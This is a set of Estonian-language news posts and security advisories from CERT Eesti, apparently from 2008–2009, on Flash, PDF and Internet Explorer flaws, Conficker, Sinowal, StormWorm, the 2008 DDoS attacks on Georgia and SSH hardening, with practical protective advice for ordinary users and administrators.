Adobe sai ämbrid kohe mõlema jala otsa – lühikese vahega leiti vead nii PDF lugejas kui Flashi mängijas. Tõstku käsi, kes viimase tunni jooksul pole tahtlikult või tahtmatult Flash animatsiooni või PDF dokumenti vaadatanud! Kõigile on selge, et reaalselt pahategudeks kasutatavate vigade avastamine nii laialt levinud rakendustes paneb administraatorid ja turvajuhid nõutult pead raputama. Keelata Flash? Keelata PDF? Jah, võimalik, ent tegelikkuses mitte väga reaalne. Kui asutused suudaksidki selle sisemiste meetmetega peale sundida, siis kodukasutajale ei ole kuidagi võimalik selgeks teha, et ta peaks loobuma Youtube videote vaatamisest. Rääkimata sellest, et erinevad kampaaniad, mille algatajaks CERT Eesti ise on olnud, kasutavad tänu tema laiale levikule justnimelt sedasama Flashi. Õnneks on tublid Adobe arendajad sedapuhku kärmelt tegutsenud ja avaldanud vigastele toodetele uuendused. Head inimesed, palun uuendage Flashi mängija oma arvutis NÜÜD KOHE, kui te seda juba teinud pole.

PDFiga on lood natuke halvemad – siiani on avaldatud ainult kolmanda osapoole (mitte Adobe) mitteametlik parandus, mida ei saa kahjuks laiemale publikule soovitada. Ainus võimalus on kasutada arvutit mõistusega – kui pakutakse avamiseks tundmatut PDFi, siis ära seda ava. Täpselt nii, nagu õpetame oma lapsi – võõralt onult ei tohi kommi võtta!

Suurt kära põhjustanud pahavara hellitusnimega Conficker hakkas levima eelmise aasta lõpus kasutades selleks Windowsi turvaviga, mis võimaldas pahalasel levida ussina s.o. ilma kasutajapoolse abita. Auk lapiti oktoobrikuus, ent selgus kurb tõsiasi, et kasutajad ja firmad ei uuenda enda Windowseid! Pahavara eripära on muuhulgas proovida ära arvata kasutajate paroole, mis teatud juhtudel viib kontode lukustumiseni. See omakorda põhjustas mõnede suurte organisatsioonide töö täieliku seiskumise seniks, kuni kõik arvutid käsitsi üle kontrolliti. Arvestades tuhandetesse küündiva töökohtade arvu suuremates Euroopa asutustes, võib igaüks oletada, kui palju aega ja raha võis kuluda arvutivõrgu töökorda saamisele. Pahalane Conficker on IT turvafirma F-Secure veebruari andmetel nakatatud üle 9 miljoni arvuti ja see number on väga suur!

Operatsioonisüsteemi mittepaikamisele võib aeg-ajalt leida ka päris pädevaid seletusi – näiteks lakkab peale uuendust toimimast mõni eluliselt vajalik programm. Kuidas siis arvutit kaitsta? Lisaks uuendustele aitavad siin ka muud turvameetmed, näiteks korralikult seadistatud tulemüür, segmenteeritud võrk ja muu säärane. Julgetele ja edumeelsetele võib soovitada proovimiseks F-Secure loodud toodet Exploit Shield (http://www.f-secure.com/labs/products/12/). Seal kasutatud tehnoloogia peaks kaitsma justnimelt selliste rünnete vastu, millele rakenduse või operatsioonisüsteemi tootjal veel kaitset pole, või kui sul puudub mingil põhjusel võimalus vea paikamiseks tavapärase uuendusega. Peab mainima, et toode on beetaversioonis ja tegemist ei ole reklaamiga – lihtsalt keegi teine ei ole samalaadse toimiva lahendusega veel minuteada välja tulnud.

Ajaloolistest sündmustest on mainimist väärt jaanuaris Voorel toimunud CERT Eesti 2008. aastat kokkuvõtnud konverents. Osavõtjaid oli päris palju – tundub, et ürituste viimine Tallinnast välja oli hea mõte. Kokkusaamisel räägiti muudatustest .ee domeenide halduses, öeldi välja 2008 aasta arvutivõrkude „pahaduse“ numbrid, räägiti WiFist ja anti hoogu juurde küberkaitseliidule. Järgmine CERTi üritus laiemalt ringile on plaanis traditsiooniliselt septembris. Suve jooksul võib soodsate asjaolude kokkulangemisel toimuda paar koolitust kitsamale spetsialistide ringkonnale, aga sellest anname teada sobilikke kanaleid pidi.

Äsja olnud turvalise interneti päeval (9. veebruar) lükati suurema hulga osavõtjate koostööna käima kampaania lapsevanematele, mille materjalid leiab aadressilt http://lapsnetis.eesti.ee/. Nimetet aadressile peaks kohe-kohe ilmuma ka link videosse võetud Kalev Pihli suurepärasele loengule.

Turvalist peagisaabuvat kevadet soovides,

CERT-EE
 

Meil on rõõm edastada positiivseid uudiseid Redmondist, kus Micorsofti arendajad said valmis paigad eelmisel nädalal avaldatud laiaulatuslikule Internet Exploreri turvaveale.

Sellest johtuvalt soovitame Sul uuendada Microsoft Windowsi operatsioonisüsteemi, kui Sinu arvuti seda omal algatusel juba teinud pole.

Täpsemat infot juhtumi saab asjakohastest allikatest:
Microsofti teadaanne IE vea kohta.
Juhtum turvavigade andmebaasis.
Microsofti turvanõuanne.

Internetis surfajate turvalisus on ohustatud, kuni Microsoft tuleb välja Windowsi veebilehitseja Internet Explorer (IE) parandustega.

Veebis liikumisel peaks enamus IE kasutajad arvestama neid hetkel varitseva ohuga. Nimelt on avastet märkimisväärse mõjuga turvaauk, mille kaudu pahalased veebilehe külastaja arvutis oma kurjaloomulist koodi käivitavad. Turvaaugu kasutamiseks paigaldatakse veebilehtedele spetsiaalselt vormindatud andmed.

CERT Eesti infoturbe ekspert Tarmo Randeli sõnul võib pahatahtliku koodi käivitamine anda kurjategijatele kontrolli kasutaja arvuti üle. “Selle tagajärjel muutub zombistunud arvuti kurjategijate töövahendiks. Zombi-arvuteid kasutatakse uute viiruste levitamisel, arvutikasutajate andmeid varastatakse. Nende arvutite abil võidakse blokeerida ka Sinu lemmiksait,” selgitab Randel.

Tavakasutajal võib olla raske järgida kõiki veebis toodud juhiseid enda kaitsmiseks. Sestap toome Sinuni paar lihtsamat nippi, mille järgimine suurendab Sinu turvalisust veebis surfamisel:

- Kasuta arvuti kaitsevahendeid, mis suudavad Sinu arvutit kaitsta veebirünnete vastu: siia alla kuuluvad popimad viirusetõrjujad ja tulemüürid;
- Seni, kuni Microsoft pole avaldanud teemakohaseid uuendusi ja Sa pole neid enda arvutisse laadinud, kaalu võimalust kasutada alternatiivseid veebilehitsejaid (Mozilla Firefox, Opera jt)
- Lülita IE turvalisus tasemele “kõrge” (“high”). Seadista teavitus ActiveX komponentide ja skriptide jooksutamise kohta või lülita viimaste käivitamise võimalus välja. Kui veebilehte külastades soovitakse käivitada ActiveX komponente, siis on turvaline neist keelduda. Negatiivsest mõjust rääkides võib juhtuda, et seda veebilehte ei näe enam korrektselt. Ingliskeelseid juhendeid turvaliseks surfamiseks IEga leiab Microsofti veebist aadressilt http://www.microsoft.com/protect

Kasutajad, kellel viirusetõrjujad-tulemüürid olemas ning IE sätitud turvalisuse tasemele “kõrge”, võivad sedapuhku kergemalt hingata ja rahulikuma südamega veebipoodides jõuluoste teha.

Ühtlasi tuletab CERT Eesti arvutikasutajatele meelde, et jõulud, nagu pühad tavaliselt ikka, on spämmerite meelisaeg. Siinkohal ei pea me silmas Eesti firmade seas hoogustuvat postkastide täitmist soovimatu reklaamiga. Spämmerid saadavad jõulutervituseks maskeeritud kalastuskirja, mille ainus eesmärk on viia Sind veebilehele, kus Sulle üritatakse müüa “medikamente” või siis Sinu arvuti nakatada pahavaraga. Vihjeid turvaliseks käitumiseks leiab ka veebilehelt http://www.assapauk.ee.

Turvaauk tekkis programmeerijate veast DHTML andmeseoste käsitlemisel. Huvilised saavad sellest pikemalt lugeda Microsofti ametlikest ja natuke vähem ametlikest infokanalitest:
Microsofti ametlik leht
Technet blogi

CERT Eesti andmetel on Eestis umbes tuhatkond troojalane Sinowaliga nakatunud arvutit, mille kasutajate andmed on suure tõenäosusega jõudnud ka kurikaelteni.

CERT Eesti infoturbe ekspert Tarmo Randeli sõnul on Sinowal ohtlik pahalase märkamatu tegevuse tõttu. „Kerge on märgata varast, kes murrab lahti ukse ja lõhub aknaklaasi. Kui vargus toimub nii, et silmnähtavalt midagi ei muutu, on isegi varguse toimumise hetke raske tuvastada, rääkimata osalistest“.

Sinowal kogub nakatunud arvutitest näiteks kasutajate pangakontode ja paroolide andmeid ning saadab need arvutit kontrollivatele kurjategijatele. Ühtlasi talitab ta tavapärase troojalasena, avades kurjategijale vaba pääsu arvutisse.

Need ajad, kui viiruse kood kohe failina arvutisse laekus, on möödas. Viiruste loojad kasutavad arenenud tehnoloogiaid ja see tähendab, et viirusetõrje programmid ei avasta suurt osa arvutisse hiilinud pahalastest. Teisalt on teada, et enamus pahalasi levib kasutaja aktiivse abiga ja viimase lihtsameelsust kasutades. Ka Sinowali probleemi viimati tõstatanu, turvalahendusi pakkuva The Security Division of EMC (RSA) sõnul saavad inimesed hoida oma arvutit nakatumast, olles tähelepanelikum, kuhu minnakse ja millisele lingile vajutatakse. Juhiseid turvaliseks käitumiseks leiab näiteks www.assapauk.ee lehelt. Interneti-panka saab turvalisemalt kasutada ID-kaardi abil.

Kui inimene on siiski arvutiviiruse ohvriks sattunud, tuleb pöörduda asjatundja poole, kes arvuti puhastab. Tuleb meeles pidada, et kui kasutatav antiviirus ei avasta pahalast, proovige alternatiivseid tõrjujaid. Kindlasti vahetage kõik kasutatud kasutajanimed ja paroolid, muutke pangakontode ja FTP kontode sisselogimise koode. Samuti on hea teavitada sõpru, et nad ei usaldaks liialt Sinu e-kirjades või suhtluskeskkondades saadetud linke ja faile.

„Microsofti aasta esimest poolt kajastava turvaraporti järgi on Eestis nakatunud arvutite hulk võrreldes eelmise aastaga tõusnud 18.7%. On selge, et absoluutset kaitset saab küberkuritegevuse sellise vormi vastu pakkuda ainult arvutikasutamisest loobumine, mis pole aga tänases maailmas loomulikult reaalne. On teada, et antiviirused ei leia enam kõiki uusi, rahateenimisele suunatud pahalasi. Seega on viimane aeg hakata arvutit kasutama ka peaga, mitte ainult hiireklikkimise sõrmega“, hoiatab Randel.

CERT Eesti (Computer Emergency Response Team) tegeleb küberturvalisuse tagamisega Eesti riigivõrgus ja korraldab küberturvet riiklikul tasemel.

Nädalavahetusel jõudsid Eestisse tagasi kaks CERT Eesti spetsialisti, kes aitasid Gruusia kolleege infoturbe alastes küsimustes.

CERT Eesti eksperdid viibisid Tbilisis 12. augustist 16. augustini. Nende eesmärk oli toe pakkumine Gruusia CERTile, et muuta võimalikult palju Gruusia uudisteportaale ja valitsusasutuste kodulehti välismaailmale kättesaadavaks. Kuna paljud küberrünnete alla sattunud kodulehed on paigutatud serveritesse üle maailma, on hetkel surve Gruusia serveritele vähenenud.

Kohalikke aitasid alates küberrünnete algusest, 8.augustist, ka Poola ja Prantsusmaa rahvuslikud CERTid. Kindlasti jätkub Gruusia ja Eesti spetsialistide vaheline koostöö ka tulevikus.

CERTi tegevus
Gruusia CERT on tüüpiline ülikooli CERT, mis kuulub organisatsiooni GRENA (Georgian Research and Educational Networking Association). 8. augustil alanud küberrünnete käigus võtsid nad üle rahvusliku CERTi ülesanded ja koordineerisid rünnete tõrjumist.
Küberrünnete algusest peale on neid aidanud nii Poola kui Prantsusmaa rahvuslikud CERTid, seda nii tehniliselt kui rünnetest teavitamisel. Hetkel on Gruusias ka kaks CERT Eesti eksperti, kes kohalike assisteerivad.

Pangandus
Hetkel on jõus Gruusia keskpanga korraldus peatada kõikides pankades elektrooniline arveldamine.
Alates 9. augusti varahommikust on rünnaku all Gruusia suurim pank, TBC. Panga süsteemiadministraatori sõnul on nad süsteeme umber seadistanud ja üsna kindlad, et suudavad rünnakutele vastu astuda, kui taas teenuseid pakkuma hakkavad.

Interneti teenusepakkujad
Suurima kohaliku Interneti teenusepakkuja Caucasuse andmetel võis ründajate poolne internetiliikluse ümbersuunamine mõjutada väiksemaid Gruusia Interneti teenusepakkujaid. Probleemi võimendas fakt, et füüsiline kaabel jooksis läbi sõjategevuse piirkonna. Tänaseks kogutud informatsioon viitab sellele, et ümbersuunamisest tekkinud probleemid olid oluliselt suuremad, kui riigi sees arvati.
Hetkel ehitab Caucasus Interneti otselinki Lääne-Euroopasse. Lõpetamisel on Musta merd läbistava fiiberoptilise kaabli paigaldamine.
Interneti teenusepakkuja UTG server ei vastanud ja ei olnud võimeline teenust pakkuma. Hetkeks on teenus taastatud.

Kokkuvõtteks võib öelda, et hetkel toimib Internet suhteliselt hästi, mobiilivõrk on veidi ebastabiilsem. Enamus rünnakute all olevaid kodulehti on ajutiselt kolitud erinevatesse paikadesse üle maailma. Näiteks on uudisteagentuur Interpress (http://www.interpress.ge) majutusel firmas Servage. Majutust pakkuva ettevõtte Tulip juures on Gruusia kaitseministeeriumi (http://www.mod.gov.ge) ja presidendi (http://www.president.gov.ge) kodulehed. Eestis on hetkel Gruusia välisministeeriumi (http://www.mfa.gov.ge) ja uudisteportaali Civil (http://www.civil.ge) kodulehed.

Rünnaku all olnud lehed

Teiste hulgas olid DDoS rünnaku all:
www.president.gov.ge   
www.government.gov.ge  
www.parliament.ge  
www.abkhazia.gov.ge  
www.mfa.gov.ge  
www.mod.gov.ge  
www.mes.gov.ge  
www.naec.gov.ge  
www.interpressnews.ge  
www.forum.ge  
www.civil.ge  
www.presa.ge  
www.apsny.ge  
www.rustavi2.com  

Teiste hulgas olid näotustatud:
www.day.az  
www.today.az  
www.ans.az  

Hoolimata ilmataadi tembutustest on ilmselge, et suvi tulemata ei jää. Suvega kaasnevad paratamatult puhkused, ununenud paroolid ja alalõpmata kadunud IT hooldustehnik, kellele helistades kostab tavaliselt taamal kohin, mille ta serveriruumi konditsioneeriks nimetab, ent mis meenutab pigem merd ... Enne lühikese, ent vihmase, puhkuse nautimist soovitaks mõelda mõnedele nippidele, mis aitavad puhkust turvalisemalt veeta.

Eesti pangad pakuvad konto seisu muudatustest teavitavaid SMS-sse, soovitaks selle kindlasti tellida, vähemalt puhkuseperioodiks. Kui pahalased peaks oma valdusesse saama teie pangakaardi või tegema sellest koopia, annab see võimaluse neil sabast kinni saada enne, kui suurem häda sündida jõuab. Krediitkaardi puhul tuleks kindlasti jälgida väljavõtteid, mis esitatakse enne igakuist arveldamist.

Soome turvaintsidentide käsitlejad CERT-FI ja Briti kriitilise infrastruktuuri kaitse agentuur CPNI teavitasid vigadest andmete pakkimist kasutavates rakendustes.

Soomes tegutsev Oulu University Secure Programming Group (OUSPG) leidis testides vigu enamikust ACE, ARJ, BZ2, CAB, GZ, LHA, RAR, TAR, ZIP ja ZOO vormingus faile avavatest programmikoodidest. Pakkimiseks kasutatavad programmikoodid on samaaegselt kasutusel paljudes tarkvaratoodetes, muuhulgas ka viirusetõrje programmides. Pakkimine on failide mahu vähendamine matemaatilisi algoritme kasutades, enamusele arvutikasutajatele on kindlasti tuttav pakkimisprogramm WinZIP.

CERT Eesti infoturbe spetsialisti Tarmo Randeli sõnul oli Oulu Ülikooli teadurite leid suuremaastaabiline just pakkimist kasutavate rakenduste laia leviku tõttu: “Sama mustri järgi tekkinud vead on operatsioonisüsteemides, veebiserverites, viirusetõrje programmides ja spetsiaalsetes pakkimisprogrammides.”

“Hea tava järgides tuleb turvavea leidmisel teavitada esmalt asjassepuutuvaid osapooli. See annab tarkvara tootjale võimaluse parandada tooted, enne kui sellest mingi häda sündida võiks. OUSPG teavitas tarkvaratootjaid vigadest pakkimisalgoritmides juba eelmisel aastal, mis jättis neile piisavalt pika reageerimisaja. Tavakasutajale märkamatult on viimase poole aasta jooksul vead enamikus rakendustes parandatud. Kuna hetkel ei ole teada ühtegi pahavara, mis just neid nõrkusi arvutite ründamiseks kasutab, ei ole ka otsest ohtu uuendamata tarkvara kasutajatele. Samas tuleks kindlasti paigaldada tarkvarauuenduste tekkimisel need nii kiiresti kui võimalik, sest ajalugu on näidanud, et peale turvavea avalikustamist tekivad koheselt ka just seda auku kasutavad pahalased”, selgitab Randel.

Täpsemat infot CERT-FI avaldusest leiab siit.   
F-secure on parandused oma viirusetõrje toodetele avaldanud, selle kohta leiab infot siit.   

20.02.2008

Eesti riigivõrgu liiklust analüüsides oleme täheldanud kõrgendatud tähelepanu SSH teenuse vastu, mida reeglina kasutatakse serverite kaughaldamiseks.

Sellest tulenevalt paluksime Teil oma hallatavates serverites teha kiire turvaaudit avastamaks võimalikke kasutajatunnuste kompromiteerimisi.
Võimaluste piires palume kasutusele võtta vajalikud meetmed edasiste rünnete tõkestamiseks: 
• piirata ligipääs SSH pordile (TCP/22);
• jõuga SSH paroolide lahtimurdmise tõkestamine (denyhosts vms);
• keelata juurkasutajal SSH kaudu sisselogimine;
• kasutada SSH-d koos VPN lahendustega.

Jõudu soovides,
CERT Eesti

...ehk viimase aja küberpahalaste tegevused.

14.03.2008

Pahalane nimega StormWorm (tuntud ka kui Peacomm, NuWar jne) on aktiivsemalt ennast e-posti teel levitama hakanud. Saades e-kirja, mis väidab, et lahe e-kaart on justnimelt Teid mingil veebiaadressil ootamas, ei maksa seda eriti tõsiselt võtta. Linuxi / Maci kasutajad võivad hetkel veel suht turvaliselt mainitud kohta väisata, aga Windowsi kasutajatel ei soovitaks küll liimile minna. Nimetet pahalase kirjad tunneb ära sellest, et reeglina on veebiaadress IP aadressi, mitte DNS nimena: näiteks “You have been sent a Funny Postcard http://192.168.1.1/ ”.

Vene taustaga küberkurjategijate äriühing “Loads.cc”, kelle peamiseks tegevusalaks on seni olnud botneti rent, on peale konkurentide poolt ülevõtmist taas pead tõstmas. Äritegemiseks vajalikku rakendust levitatakse Windowsi kasutajatele 3D ekraanisäästja nime all. Peale installeerimist jääb rakendus käsuootele, paikneb ta kõvakettal “%HOMEDRIVE%\Documents and Settings\LocalService\Local Settings\Application Data\cftmon.exe”. Rakendus on kõigi eelduste kohaselt mitmekülgne, eeskätt DoS rünnakutele orienteeritud, aga võimeline ümber profileeruma vastavalt kliendi soovile. Ja arvutiomanik ei ole see klient, kelle arvamusega arvestatakse ...

Märkimist väärivad veel e-posti teel tehtavad reklaamikampaaniad maagilistele potentsi suurendavatele ravimitele. Kuigi pakkumised võivad tunduda soodsad, müüakse Teile tõenäoliselt tervistavaid vitamiine, mis juhuslikult näevad välja sarnased reklaamitud mõjuga ravimitele. Lisaks on krediitkaardi andmeid kergekäeliselt väljastades oht, et krediitkaarti kuritarvitatakse.

Tuletame meelde, et äsja publitseeris Microsoft märtsikuised uuendused oma toodetele – kasutage legaalset tarkvara ja uuendage seda regulaarselt, säästate end mitmetest võimalikest probleemidest. Microsoft avaldab reeglina oma tarkvarauuendused iga kuu teise nädala kolmapäeva hommikul (Eesti aja järgi).

Turvalisi lihavõtteid soovides,
CERT Eesti

Sellest, mis eelmisel aastal inimesi ärevil hoidis, kirjutab CERT Eesti infoturbe spetsialist Tarmo Randel.

CERT Eesti 2007. aasta kokkuvõte